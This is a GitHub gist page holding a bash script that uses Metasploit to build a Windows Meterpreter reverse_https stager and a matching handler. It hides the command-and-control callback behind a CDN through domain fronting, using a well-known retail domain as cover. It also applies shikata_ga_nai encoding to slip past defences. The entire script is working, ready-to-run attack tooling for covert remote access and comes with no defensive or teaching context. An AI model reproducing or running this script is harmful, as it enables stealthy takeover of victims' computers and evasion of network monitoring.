Created
July 2, 2019 15:20
-
-
Save vp777/c8b0d851e5cc010d33803f740947afc0 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
frontable_domain=${1:-www.amazon.co.uk} | |
fronted_domain=${2:-your.cloudfront.net} | |
cert_path="ssl cert path" | |
cdn_port=443 | |
local_port=443 | |
echo "Frontable domain: $frontable_domain, Fronted: $fronted_domain" | |
msfpath="/root/metasploit-framework" | |
msfvenom="${msfpath}/msfvenom" | |
msfconsole="${msfpath}/msfconsole" | |
_stager_gen="${msfvenom} -p windows/meterpreter/reverse_https LHOST=%frontable_domain% LPORT=%cdn_port% HttpHostHeader=%fronted_domain% StagerVerifySSLCert=true PayloadUUIDTracking=true PayloadUUIDName=bocrev -f psh-cmd" | |
stager_gen=${_stager_gen/'%frontable_domain%'/$frontable_domain} | |
stager_gen=${stager_gen/'%fronted_domain%'/$fronted_domain} | |
stager_gen=${stager_gen/'%cdn_port%'/$cdn_port} | |
$stager_gen | |
sleep 10 | |
#listener_file="df_un_en.rctemplate" | |
#_listener=$(cat "$listener_file") | |
_listener=" | |
use exploit/multi/handler | |
set PAYLOAD windows/meterpreter/reverse_https | |
set LHOST %frontable_domain% | |
set LPORT %local_port% | |
set OverrideRequestHost true | |
set EnableStageEncoding true | |
set StageEncoder x86/shikata_ga_nai | |
set HttpHostHeader %fronted_domain% | |
set HandlerSSLCert %cert_path% | |
set IgnoreUnknownPayloads true | |
set StagerVerifySSLCert true | |
set ExitOnSession false | |
exploit -j -z | |
" | |
listener=${_listener/'%frontable_domain%'/$frontable_domain} | |
listener=${listener/'%fronted_domain%'/$fronted_domain} | |
listener=${listener/'%cdn_port%'/$cdn_port} | |
listener=${listener/'%local_port%'/$local_port} | |
listener=${listener/'%cert_path%'/$cert_path} | |
${msfconsole} -r <(echo "$listener") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment